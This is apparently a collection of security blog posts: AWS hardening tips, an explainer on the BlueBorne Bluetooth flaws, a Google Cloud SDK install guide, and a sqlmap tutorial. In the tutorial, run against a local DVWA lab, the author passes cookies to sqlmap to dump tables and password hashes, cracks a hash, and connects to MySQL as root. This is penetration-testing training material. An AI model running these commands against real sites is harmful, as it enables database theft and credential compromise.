AWS Cloud Security Guide For Starter

As AWS and Security practitioners on large-scale AWS deployments, we’ve about seen it all. Most of these are very easy to implement and will go a very long way to ensuring your success on AWS.
1. Disable Root API Access Key and Secret Key
In AWS parlance, a “root” user is the login credential you used to create your AWS account with. This user was originally  required for some very important aspects of your access to AWS services. It must be used only to create your initial administrative accounts in IAM.  All future administration should then be done with these newly created IAM accounts.
Create 2-3 IAM users with administrative policies via a group.  It is highly recommended that you create at least 2, but no more than 3 IAM administrators.  This provides redundancy in case credentials are lost but limits the number of users with unlimited access to your AWS resources.
Disable/Remove the default AWS root user API access keys.Before deleting the root api make sure you create admin accounts.

2. Enable MFA Tokens Everywhere
There is also a nearly combative challenge between some more traditional security practices where the powers that be keep increasing the minimum password length, complexity requirements, shortening the time between password changes, or some combination.  While these practices look good on paper, and may get you a compliance check box filled, in reality, they may drive actual users to the opposite behaviors.  Some popular examples are storing passwords in an email or text message (today’s version of writing it on the keyboard or monitor,) using a rotation pattern with a series of similar passwords, incrementing a password by just adding a number, or bracketing an easily remembered word with special characters.
Given the potential risk, and undesirable outcome, adding another layer of security here just makes good business sense.  Let’s be honest, a realistic password policy with an added extra layer of security on top of it helps the business, the users, and you stay secure.

3.Reduce IAM Users with Admin Rights
While the most common response in no, in many cases, IAM users are given full access to your AWS environment which includes both creating and deleting resources in all of the services. With the low cost of storage in the cloud, it is a recommended best practice to limit those users and applications that can permanently delete information.
AWS has provided you the ability in many situations to implement the least privilege methodology in many ways that may not be possible, or challenging to implement, in a traditional on-premise infrastructure.
While limiting access is a good best practice, there is always the need to do things that require increased privileges.  You may want to allow a user to delete S3 objects, or you may want to give someone Admin privileges while you are away.

4.Use Roles for EC2
If you’re deploying an application on AWS that requires more than a simple web server, you’re going to quickly want to take advantage of AWS’ giant list of services. After all, we use AWS because we love building awesome things with these services.
In order for an application on an EC2 instance to store objects in S3, process messages from an SQS queue or any number of other AWS services, it will require permission to access the service’s API. The only way to communicate with the API is with an authentication token.
AWS uses API Access and Secret keys to get that authentication token, and yes, your application running on an EC2 instance will need that key pair to get to S3.
By implementing the Roles API key based approach org can have following benifits.

a. Reduced the surface area of attack
EC2 Role credentials are unique to an EC2 instance, if an instance is compromised, terminate the instance and let AutoScaling take care of launching a new one. No need to rotate keys like when an IAM Access Key is compromised.

b. Temporary authentication credentials
STS automatically rotates the credentials when the token expires, and the SDKs and CLI know how to handle this automatically.

c. Auditable activity
The AWS CloudTrail service allows you to examine activity from Roles.

d. Automatically generated authentication credentials
The Access key is not statically assigned to an IAM user, so there is no need to store them in a configuration file.

e. Limited privilege
Roles can be assigned IAM policies, so you can create Roles with very specific access to AWS services and resources. If a group of instances should send messages to a specific SNS topic, then you can restrict it to that topic ARN in the policy.


5. Least Privilege: Limit what IAM Entities Can Do with Strong Policies
Least privilege: Every program and every user of the system should operate using the least set of privileges necessary to complete the job. Primarily, this principle limits the damage that can result from an accident or error. It also reduces the number of potential interactions among privileged programs to the minimum for correct operation, so that unintentional, unwanted, or improper uses of privilege are less likely to occur. Thus, if a question arises related to misuse of a privilege, the number of programs that must be audited is minimized.

6.Rotate all the Keys Regularly
AWS recommends that as a best practice that all credentials, passwords and API Access Keys alike, be rotated on a regular basis. If a credential is compromised, this limits the amount of time that a key valid for.
One best practice I followed was that API Access keys were to be rotated every 90 days. My process was simple, but burdensome: 1) An operator tracked the age of an Access Key; 2) The operator created a new Access Key; 3)
The operator then supplied the new Access Key to the automation process; 4) After testing and deploying, the old Access Key was deactivated. Eventually, or at next rotation, the old Access Key was deleted


7.Watch your security groups
AWS provides the tools necessary to help control what traffic is allowed, and in this blog, we are going talk about Security Groups and their relatives, the Network Access Control List (NACL).
An old network sage once told me, “Block everything, only allow in what you need,” and in many cases he was spot on. If you try to figure out what to block all the time, that may be your full time job and a pretty negative one at that.
So, do you need to allow all traffic from 0.0.0.0/0?  In AWS Network terms, that means everyone, every machine, everywhere has the ability to make a connection to your AWS resources.

8.World-Readable/Listable S3 Bucket Policies
By default, S3 does have a default Deny rule, so if you do nothing, only the account owner will ever be able to use S3. However, a quick review reveals three places where you can configure additional access to S3, IAM Policies, S3 Bucket Policies, and S3 Access Control Lists (ACLs).
Each one of these, or any combination of these, can be used to control access to S3, but as you grow with the service over time, it is possible to lose track of where or what is allowing access. This can open up security holes where you were not aware they existed. This can put your data at risk of loss or compromise
So, as a security best practice, it would be highly recommended to not use any S3 ACL if you can. While these do offer an easy way to configure access, they should be considered a legacy security control and not used
There are genreally 2 better options to configure your s3 bucket policies

If you are leveraging one more than the other, and it is working, it is okay to stick with that one. If you haven’t made a decision yet, I am going to reiterate what AWS include in the blog post above:

a.If you’re more interested in “What can this user do in AWS?” then IAM policies are probably the way to go. You can easily answer this by looking up an IAM user and then examining their IAM policies to see what rights they have

b.If you’re more interested in “Who can access this S3 bucket?” then S3 bucket policies will likely suit you better. You can easily answer this by looking up a bucket and examining the bucket policy
Pick one, and stick with it. Make it a policy going forward and try to stay away mixing them. It will be easier in the long run and for the people who follow in your footsteps.



References:
https://aws.amazon.com/documentation/
https://blogs.aws.amazon.com/security/
https://www.cisecurity.org/benchmark/amazon_web_services/
https://cloudsentry.evident.io

BlueBorne Attack Explained

Overview
BlueBorne is an attack vector by which hackers can leverage Bluetooth connections to penetrate and take complete control over targeted devices. BlueBorne affects ordinary computers, mobile phones, and the expanding realm of IoT devices. The attack does not require the targeted device to be paired to the attacker’s device, or even to be set on discoverable mode. Armis Labs has identified eight zero-day vulnerabilities so far, which indicate the existence and potential of the attack vector. Armis believes many more vulnerabilities await discovery in the various platforms using Bluetooth. These vulnerabilities are fully operational and can be successfully exploited, as demonstrated in our research. The BlueBorne attack vector can be used to conduct a large range of offenses, including remote code execution as well as Man-in-The-Middle attacks.


Risk

BlueBorne targets the weakest spot in the networks’ defense – and the only one that no security measure protects. Spreading from device to device through the air also makes BlueBorne highly infectious. Moreover, since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.

Devices Are Affected

Android

•   All Android phones, tablets, and wearables (except those using only Bluetooth Low Energy) of all versions are affected by four vulnerabilities found in the Android operating system, two of which allow remote code execution (CVE-2017-0781 and CVE-2017-0782), one results in information leak (CVE-2017-0785) and the last allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-0783).

  
Windows

• All Windows computers since Windows Vista are affected by the “Bluetooth Pineapple” vulnerability which allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-8628).

Linux

•     Linux is the underlying operating system for a wide range of devices. The most commercial, and consumer-oriented platform based on Linux is the Tizen OS.
•     All Linux devices running BlueZ are affected by the information leak vulnerability (CVE-2017-1000250).
•     All Linux devices from version 3.3-rc1 (released in October 2011) are affected by the remote code execution vulnerability (CVE-2017-1000251).

  
The BlueBorne attack vector has several stages. First, the attacker locates active Bluetooth connections around him or her. Devices can be identified even if they are not set to “discoverable” mode. Next, the attacker obtains the device’s MAC address, which is a unique identifier of that specific device. By probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective. At this stage the attacker can choose to create a Man-in-The-Middle attack and control the device’s communication, or take full control over the device

DEMO

Google Cloud Platform SDK Setup

Tools for Cloud Platform

The Cloud SDK is a set of tools for Cloud Platform. It contains gcloud, gsutil, and bq, which you can use to access Google Compute Engine, Google Cloud Storage, Google BigQuery, and other products and services from the command-line. You can run these tools interactively or in your automated scripts

Manage Virtual Machine

gcloud makes it easy to manage your fleet of virtual machines on Compute Engine ‐ everything from creating, starting and managing VM instances to rolling your own VM images. You can also use gcloud to make SSH connections to your instances

Run Local Service Emulators

Cloud SDK emulators for Google Cloud Pub/Sub and Google Cloud Datastore allow you to simulate these services in your environment for local development, testing and validation. You start and manage service emulators using the gcloud tool

System requirements

Cloud SDK runs on Linux, Mac OS X and Windows, and requires Python 2.7.x. Some tools bundled with Cloud SDK have additional requirements. For example, Java tools for Google App Engine development require Java 1.7 or later

Download

To install the latest release of Cloud SDK from a versioned archive:
https://cloud.google.com/sdk/downloads

Extract the file to any location on your file system

and go to the location where you have extract the file.

Optional. Run the install script to add Cloud SDK tools to your path, enable command-completion in your bashshell (Linux and Mac OS only) and enable usage reporting.

On Linux or Mac OS X:./google-cloud-sdk/install.sh
On Windows:.\google-cloud-sdk\install.bat

It take Few Minutes.

once done you will see this kind of screen

Once The setup complete you need to hit the command

#gcloud init

Then click on the link to verify your account. 
now you can use your local shell to connect to the google cloud instances and manage them.

There is a video to demonstrate how to set up google cloud sdk 

https://www.youtube.com/watch?v=gjWyzn5jzZQ 

SQLMap for post authentication(after login) URL's

Normally users use sqlmap for the url which are available before login. But if there is a possibility of sql injection on a url which appear after login then what to do. If the user try to run sqlmap for the url then normally he gets 302 error. There are multiple way to use sqlmap. We can use sqlmap for after login url also. Here I list down almost all possible way to use sqlmap. And in demonstration I am gonna show how use sqlmap for after login url with cookie option.

SQLMap is a free and an open source tool that is used to detect and exploit SQL injection flaws. It has very nifty features that automate the process of detection and exploitation. SQLmap is also used for database fingerprinting, access underlying file system and execute sql commands.

You can download SQLmap from SourceForge here: http://sourceforge.net/projects/sqlmap/

SQLmap Command

Here is the full list of available options:

Options:

1.     –version show program’s version number and exit

2.     -h, –help show this help message and exit

3.     -v VERBOSE Verbosity level: 0-6 (default 1)

General:

These options can be used to set some general working parameters.

1.      -t TRAFFICFILE Log all HTTP traffic into a textual file

2.      –batch Never ask for user input, use the default behaviour

3.      –charset=CHARSET Force character encoding used for data retrieval

4.      –check-tor Check to see if Tor is used properly

5.      –crawl=CRAWLDEPTH Crawl the website starting from the target url

6.      –csv-del=CSVDEL Delimiting character used in CSV output (default “,”)

7.      –eta Display for each output the estimated time of arrival

8.      –flush-session Flush session file for current target

9.      –forms Parse and test forms on target url

10.  –fresh-queries Ignores query results stored in session file

11.  –hex Uses DBMS hex function(s) for data retrieval

12.  –parse-errors Parse and display DBMS error messages from responses

13.  –replicate Replicate dumped data into a sqlite3 database

14.  –save Save options to a configuration INI file

15.  –tor Use Tor anonymity network

16.  –tor-port=TORPORT Set Tor proxy port other than default

17.  –tor-type=TORTYPE Set Tor proxy type (HTTP – default, SOCKS4 or SOCKS5)

18.  –update Update sqlmap

Target

To specify the target options these are the sqlmap options which can be used to get the desired result from sql injection. there must be one options has to be specify to use the sqlmap.

-d DIRECT Direct connection to the database

1.     -u URL, –url=URL Target URL (specify the target url)

2.     -l LOGFILE Parse targets from Burp or WebScarab proxy logs

3.     -m BULKFILE Scan multiple targets enlisted in a given textual file

4.     -r REQUESTFILE Load HTTP request from a file

5.     -g GOOGLEDORK Process Google dork results as target URLs

6.     -c CONFIGFILE Load options from a configuration INI file

Request:

There are multiple option in sqlmap to specify how to connect to the target url or target address. These options can be used to specify how to connect to the target URL. For the url's, which appear after authentication or after login. We can use cookie parameter to perform attack on the url. Sqlmap can also read the cookie from a file the can be the request and response captured in burp or ZAP and saved as a text file.

1.      –data=DATA Data string to be sent through POST

2.      –param-del=PDEL Character used for splitting parameter values

3.      –cookie=COOKIE HTTP Cookie header

4.      –load-cookies=LOC File containing cookies in Netscape/wget format

5.      –cookie-urlencode URL Encode generated cookie injections

6.      –user-agent=AGENT HTTP User-Agent header

7.      –random-agent Use randomly selected HTTP User-Agent header

8.      –randomize=RPARAM Randomly change value for given parameter(s)

9.      –force-ssl Force usage of SSL/HTTPS requests

10.  –host=HOST HTTP Host header

11.  –referer=REFERER HTTP Referer header

12.  –headers=HEADERS Extra headers (e.g. “Accept-Language: frnETag: 123″)

13.  –auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)

14.  –auth-cred=ACRED HTTP authentication credentials (name:password)

15.  –proxy=PROXY Use a HTTP proxy to connect to the target url

16.  –proxy-cred=PCRED HTTP proxy authentication credentials (name:password)

17.  –delay=DELAY Delay in seconds between each HTTP request

18.   –skip-urlencode Skip URL encoding of POST data

19.  –retries=RETRIES Retries when the connection timeouts (default 3)

20.  –scope=SCOPE Regexp to filter targets from provided proxy log

21.  –safe-url=SAFURL Url address to visit frequently during testing

22.  –safe-freq=SAFREQ Test requests between two visits to a given safe url

23.  –timeout=TIMEOUT Seconds to wait before timeout connection

Injection:

SQLMap also accept user defined sql injection payload. In SQLMap we can set which parameter we want to test for sql injections. These options can be used to specify which parameters to test for, and provide custom injection payloads and optional tampering scripts

1.      -p TESTPARAMETER Testable parameter(s)

2.      –dbms=DBMS Force back-end DBMS to this value

3.      –os=OS Force back-end DBMS operating system to this value

4.      –invalid-bignum Use big numbers for invalidating values

5.      –invalid-logical Use logical operations for invalidating values

6.      –no-cast Turn off payload casting mechanism

7.      –prefix=PREFIX Injection payload prefix string

8.      –suffix=SUFFIX Injection payload suffix string

9.      –skip=SKIP Skip testing for given parameter(s)

10.  –tamper=TAMPER Use given script(s) for tampering injection data

Techniques:

These options can be used to tweak testing of specific SQL injection techniques.

1.      –technique=TECH SQL injection techniques to test for (default “BEUST”)

2.      –time-sec=TIMESEC Seconds to delay the DBMS response (default 5)

3.      –union-cols=UCOLS Range of columns to test for UNION query SQL injection

4.      –union-char=UCHAR Character to use for bruteforcing number of columns

5.     –dns-domain=DNAME Domain name used for DNS exfiltration attack

Enumeration:

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

1.      -b, –banner Retrieve DBMS banner

2.      –current-user Retrieve DBMS current user

3.      –current-db Retrieve DBMS current database

4.      –is-dba Detect if the DBMS current user is DBA

5.      –users Enumerate DBMS users

6.      –passwords Enumerate DBMS users password hashes

7.      –privileges Enumerate DBMS users privileges

8.      –roles Enumerate DBMS users roles

9.      –dbs Enumerate DBMS databases

10.  –tables Enumerate DBMS database tables

11.  –columns Enumerate DBMS database table columns

12.  –schema Enumerate DBMS schema

13.  –count Retrieve number of entries for table(s)

14.  –dump Dump DBMS database table entries

15.  –dump-all Dump all DBMS databases tables entries

16.  –search Search column(s), table(s) and/or database name(s)

17.  -D DB DBMS database to enumerate

18.  -T TBL DBMS database table to enumerate

19.  -C COL DBMS database table column to enumerate

20.  -U USER DBMS user to enumerate

21.  –exclude-sysdbs Exclude DBMS system databases when enumerating tables

22.  –start=LIMITSTART First query output entry to retrieve

23.  –stop=LIMITSTOP Last query output entry to retrieve

24.  –first=FIRSTCHAR First query output word character to retrieve

25.  –last=LASTCHAR Last query output word character to retrieve

26.  –sql-query=QUERY SQL statement to be executed

27.  –sql-shell Prompt for an interactive SQL shell

Windows registry access:

These options can be used to access the back-end database management system Windows registry.

1.      –reg-read Read a Windows registry key value

2.      –reg-add Write a Windows registry key value data

3.      –reg-del Delete a Windows registry key value

4.      –reg-key=REGKEY Windows registry key

5.      –reg-value=REGVAL Windows registry key value

6.      –reg-data=REGDATA Windows registry key value data

7.      –reg-type=REGTYPE Windows registry key value type

Miscellaneous:

1.      -z MNEMONICS Use short mnemonics (e.g. “flu,bat,ban,tec=EU”)

2.      –beep Sound alert when SQL injection found

3.      –check-payload Offline WAF/IPS/IDS payload detection testing

4.      –check-waf Check for existence of WAF/IPS/IDS protection

5.      –cleanup Clean up the DBMS by sqlmap specific UDF and tables

6.      –dependencies Check for missing sqlmap dependencies

7.      –disable-hash Disable password hash cracking mechanism

8.      –disable-like Disable LIKE search of identificator names

9.      –gpage=GOOGLEPAGE Use Google dork results from specified page number

10.  –mobile Imitate smartphone through HTTP User-Agent header

11.  –page-rank Display page rank (PR) for Google dork results

12.  –purge-output Safely remove all content from output directory

13.  –smart Conduct through tests only if positive heuristic(s)

14.  –test-filter=TSTF Select tests by payloads and/or titles (e.g. ROW)

15.  –wizard Simple wizard interface for beginner users 

Demonstration

As I am using kali linux and sqlmap runs beautifully in this operating system. I am using Virtualbox to run DVWA application in linux based operating system. http://172.16.221.128/dvwa/ is the url where we are going to attack. The application credentials are.

Username : admin

Password: password.

 
After successful login we will navigate to the url:
http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# 

If we try sqlmap on the same url with the command:
 sqlmap -u http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# --dbs

 

here –dbs is to find databases.

it will give error like this:

As all the security analyst or application security tester all are familiar with burp-suite. If you are not then please go through a burp poxy setting tutorial. If you now how capture a request in proxy (burp-suite) then capture the request in burp and note down the cookie values.

 

Here the cookie values are :

security=low;
PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9;

 

Now try the sqlmap with this comman:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" –dbs

Used Options:

1.       –dbs: Enumerate DBMS databases

2.       --cookie: cookie value

3.       -u : url

And follow the process.

 

Or you can try with forms options. The command will be like:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/" --forms --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --dbs

Used Options:

1.       –dbs: Enumerate DBMS databases

these two commands will give the same result.

The out put will be like this 

As we can see the list of databases, now try to find a tables in database dvwa. The command will like:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" -D dvwa –tables

Used Options:

1.       -D : user supplied database name

2.       – tables : enumerate list of tables in the user supplied database

And the output will be like this.

 

Now to see what inside the users tables the command will be like this:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" -D dvwa -T users –dump

Used Options:

1.       -T: user supplied table name

2.       – dump : get all the data inside the user supplied table.

 

The output will be like.

 

OK Lets have some more fun.

To find the current database username try this command.

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" –current-user

Used Options:

--current-user : enumerate the current database user name 

This will show you the current database user name. The output will contain some more information like, PHP version, underline operating system, version of the mysql database. Here the username is root.

 

The following command will enumerate all DBMS users and password hashes that can crack it later for any further attacks.

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --string=”Surname” –users –password”

Used Options:

1.       –string : String to match in page when the query is valid

2.       –users : Enumerate DBMS users

3.       –password : Enumerate DBMS users password hashes.

Or get the hashes and try to crack using different methods like john the ripper or any other hash crack tools.

As I try john the ripper for the hash of username smithy. Passsword is admin.

Lets have some more fun.

By using the command:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" –current-use

we are able to know that the current-user is root. Noe try to connect using mysql console.

To connect using mysql console the command will be

 mysql -h 172.16.221.128 -u root -p

 

Now we have full access in the database. Attacker can create update or delete the all records.